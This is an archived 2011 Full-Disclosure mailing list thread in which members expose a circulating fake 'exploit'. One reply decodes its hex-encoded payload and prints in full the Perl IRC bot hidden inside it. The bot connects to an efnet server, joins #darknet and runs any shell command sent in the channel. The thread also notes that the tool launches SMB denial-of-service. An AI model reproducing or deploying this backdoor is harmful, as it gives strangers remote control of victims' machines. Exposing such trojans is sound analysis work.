| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 27 Oct 2011 08:58:05 +1100
From: GloW - XD <doomxd@...il.com>
To: Flavio do Carmo Junior <carmo.flavio@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: I know its old,
but what the heck does this do... (exposing a tool...)
Ok... am awake now and, have some infos yes...
Interesting bot.
Seems i have spoken with some people regarding this and the release.Here is
a brief outline of how it goes.
Attacks were done on some people who run shells on efnet irc network, so in
order to catch the *morons8 or, ppl who did launch the DoS
would then be showing up in #darknet channel, and responds to the ops or,
channel.
I ran this and saw it still clobbers smb,and still uses the original bug, so
d0s will still occur,
however, it will try and join, i believe thats a dead link in there now but,
would have tried to join a efnet node..
Speaking with #darknet owners:
> ok dude why was this released...
msg> we released the original working code. this started a massive war of
the kids,
unfortunately many innocent boxes got raped, so we decided to play a small
game, and make a *version plus*
or so so say.
> very interesting concept, new, intuitive to use perl, as many people would
decrypt it tho, using perl -e , isnt this alittle harsh...
msg> they run it, it wont affect them, atall, they will see the connection
and kill it,and since no D0s is launched, it wont really work
> hrmm well, it is a good idea, to capture the arseholes who wish to ddos
etc... i see why it is done but also, can i ask you
do you know what a darknet is ? because, you seem to not see that, ppl
would assume this channel is all about 'darknets'..
instead it is only capturing people who will launch a DoS tool,and many
people seem 'idle'.
msg> we dont control who comes here, now care, but when it comes to d0s, we
dont scrw about.hit us,and we will hit back.
Also, why are you asking me about code wich was made in 2003 or so :P~
> ahh well, thats purely because, i expose any BS like this code is, but, i
will not mark this as bullshit.
it is horseshit :P and, i respect that your at the least, using some
shitty tool like d0s, instead of faking an exploit.
I will class this not as exposed atall, instead, it will serve as some
form of tuition to skids.
Run the tools you cannot read, and, expect even some shitty perlbot to pop
out. I like it!
I will class this as exposed but intuitive, thankyou for your time.
msg> i dont care what you mark it as, the rule is simple, do not run d0s
./appz ! Have a nice day!
> Again thanks for your time, i will keep the nickname anonymous... your not
classed as a now-owner , so i guess it is more wtf this was all about, even
when you wrote the .c or, as i know it,
was 'brain' or some dude... either way, i tip the black hat to you but
also warn you not always will them kids be happy to be owned by shitty .c ,
so, id be expecting more problems from release, than not
This is your problem, and, i respect your views, just get some knowledge
into you about wtf a 'darknet' is prompto!
Also have a nice day.
..........................................
Ok so, basically the talk i had with a now non op of channel but,
interesting coz, it is actually very popular, yet only a few actually
realise that theyre being linked now to a darknet technology app etc, and
theyre finding that maybe they should have kept those old ops :P or maybe
they could just release 'ipv6killer.c' and just fix some
settings..eitherway, it is kinda unique, and strange why there was no chat
about this app, until now.. nothing
solid wich shows this perl, and admittedly, thats a VERY clever bot for such
a small piece of code.
Anyhow, thanks to those who found this interesting, sorry to those who didnt
:)
I think i might hang in darknet channel and wait for a few "Hi im a lamer!"
etc... rofl.
cheers, and cheers to #darknet for atleast not faking the tool completely,
and, using a skeleton and structure of theyre OWN code.
Winnuke2000.c is NOT backdoored, and IS theyres also, I think they regret
releasing it now but, this was 2003, and, as i said, i will try and expose
anything i find strange, however, from now on, ill be marking exposes under
noise, as theyre non disclosures.
xd
On 26 October 2011 16:55, Flavio do Carmo Junior <carmo.flavio@...il.com>wrote:
> sounds really useful...
>
> [waKKu@...5n ~]$ python -c 'hellcode=(
> "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> >
> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> >
> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> >
> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> >
> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> >
> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> >
> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> >
> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> >
> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> >
> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> >
> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> >
> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> >
> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> >
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> >
> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> >
> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> >
> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> >
> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> >
> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> >
> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> >
> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> >
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> >
> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> >
> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> >
> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> >
> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> >
> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> >
> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> >
> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> >
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> >
> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> >
> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> >
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> >
> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> >
> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> >
> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> >
> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> >
> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> >
> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> >
> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> >
> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> >
> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> > "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print
> hellcode;'
> #!/usr/bin/perl
> $chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl
> ";$SIG{TERM}={};exit
> if fork;use IO::Socket;$sock =
> IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
> +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
> /){$mode=$1;last if
> $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
> $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
> ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
> type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
> $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
> :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
> $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
> 2>/dev/null;/tmp/hi
> [waKKu@...5n ~]$
>
> print hellcode[764:];'
> /tmp/hi
>
>
> --
>
> On 26 October 2011 13:49, xD 0x41 <secn3t@...il.com> wrote:
> > yer ofc... anyhow, ignoring you now...
> >
> > you obv think your some leet troll, your not, your ONLY a TROLL :)
> > have a nice day or is that
> >
> > *Goplamamamama Ignananayu*
> >
> > forget the jedi oky, you gotta brushup on ya troll trash talk!
> > bah hahaha.
> > fool
> > xd
> >
> >
> > On 26 October 2011 13:44, Antony widmal <antony.widmal@...il.com> wrote:
> >>
> >> Using your smartphone while flipping burger can be dangerous pandawan.
> >> More over if you work at burger king.
> >>
> >>
> >>
> >> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@...il.com> wrote:
> >>>
> >>> h the idiot who thinks im laurelai... meh , your a fool yourself just
> for
> >>> even thinking that much :s
> >>> your but an echo on the list, wich, does not echo the rest of it, wich
> is
> >>> a good place to be.
> >>> unfortunately, your one of the few who should just be blocked, for
> making
> >>> absolutely nothing but abusive crap...
> >>> your an idiot. not me.
> >>> i dont run things, why, have you ran it ?
> >>> Is it good ?
> >>> hehe... maybe it is!
> >>> i guess if hes using it...well...
> >>> *sic*
> >>>
> >>>
> >>>
> >>> On 26 October 2011 13:21, Antony widmal <antony.widmal@...il.com>
> wrote:
> >>>>
> >>>> Do yourself a favor and run that code dumbass.
> >>>>
> >>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@...il.com> wrote:
> >>>>>
> >>>>> I use darknets to help me,
> >>>>> they send me the info i need.
> >>>>> simple answer to simple question.
> >>>>> look them up, they may oneday protect you, also.
> >>>>>
> >>>>>
> >>>>> On 26 October 2011 13:15, adam <adam@...sy.net> wrote:
> >>>>>>
> >>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical
> code,
> >>>>>> claims to be a remote kernel root exploit)
> >>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
> >>>>>> similar code, claims to be an IIS exploit)
> >>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
> >>>>>> thread, code is mentioned though)
> >>>>>> I'm sure there's more, but this kinda reminds me of that leaked
> >>>>>> "private exploit" on pastebin a few weeks back (you know, the one
> that was
> >>>>>> nice enough to create a _local_ root account), and insisted that it
> was
> >>>>>> private private private and specifically said NOT to leak it.
> >>>>>> I am curious as to how you're so certain that it's on "many many
> >>>>>> boxes" yet know next to nothing about it.
> >>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@...il.com> wrote:
> >>>>>>>
> >>>>>>> Hello List,
> >>>>>>> Id like people to also, like this thread asks, to pls give some
> >>>>>>> opinion, other than mine.. wich, i am yet to make;
> >>>>>>>
> >>>>>>> http://www.hackerthreads.org/Topic-5973
> >>>>>>>
> >>>>>>> Please look at this .c code on here, if you wish, and tell me, why
> >>>>>>> A. It is still in circulation, seeminlgly, on MANY MANY boxes....
> >>>>>>> B. people still seem to try keep it private :s
> >>>>>>>
> >>>>>>> This morning, a friend from webhostingtalk.com ,asked me to take a
> >>>>>>> look.
> >>>>>>> I have and, i can only sofar say, once i decrypt the shellcode, ill
> >>>>>>> know abit more..
> >>>>>>> altho , i rmember this thing, and, somany people were after it,
> >>>>>>> people were paying for it, this is first time i have seen it
> actually
> >>>>>>> disclosed tho,
> >>>>>>> admittedly only looked today.
> >>>>>>> If skiddies are using it to ddos things, I want to makesure i can
> >>>>>>> expose it, and kill the threats.
> >>>>>>> thankyou.
> >>>>>>> xd .// exposing bullshit as i ride!
> >>>>>>>
> >>>>>>>
> >>>>>>> _______________________________________________
> >>>>>>> Full-Disclosure - We believe in it.
> >>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
> >>>>>>
> >>>>>
> >>>>>
> >>>>> _______________________________________________
> >>>>> Full-Disclosure - We believe in it.
> >>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>>>> Hosted and sponsored by Secunia - http://secunia.com/
> >>>>
> >>>
> >>
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> --
> Best regards,
>
> Flávio do Carmo Júnior
> Sydney/NSW
> http://au.linkedin.com/in/carmoflavio/en
> http://0xcd80.wordpress.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists